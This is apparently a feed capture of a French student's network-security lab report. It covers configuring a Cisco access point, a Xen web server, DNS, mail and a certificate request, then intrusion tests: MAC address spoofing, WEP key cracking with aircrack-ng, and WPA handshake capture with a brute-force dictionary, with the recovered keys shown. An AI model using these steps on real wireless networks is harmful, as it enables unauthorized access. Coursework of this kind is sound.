		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Ce mini projet a pour but de nous donner des notion en sécurité informatique.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du Wifi sur l'eeePC&amp;lt;/h3&amp;gt;&lt;br /&gt;
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.&lt;br /&gt;
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. &lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
service bind9 stop&lt;br /&gt;
service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 #newaliases&lt;br /&gt;
 #mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@chien:~#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci.  &lt;br /&gt;
&lt;br /&gt;
Changement d'adresse MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On change la cles par: 0000000000&lt;br /&gt;
et le SSID : T1&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key 0000000000&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Préparation aux cassage de clés&amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WEP &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WPA&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie consiste a casser une clés WPA par force brute.&lt;br /&gt;
Je m'interesse plus particulierement a caracotte06 comme précédament.&lt;br /&gt;
 &lt;br /&gt;
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake.   &lt;br /&gt;
&lt;br /&gt;
Recuperation du Handshake: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
creation d'un dictionaire :&lt;br /&gt;
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.&lt;br /&gt;
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w Dico wpacracotte06-02.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
après quelle que heures j'obtiens la clès:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [02:00:57] 12399908 keys tested (1782.72 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399906 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B &lt;br /&gt;
                       75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E &lt;br /&gt;
                       94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E &lt;br /&gt;
                       F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E &lt;br /&gt;
                       22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23139</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23139"/>
				<updated>2015-11-23T15:00:03Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Ce mini projet a pour but de nous donner des notion en sécurité informatique.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
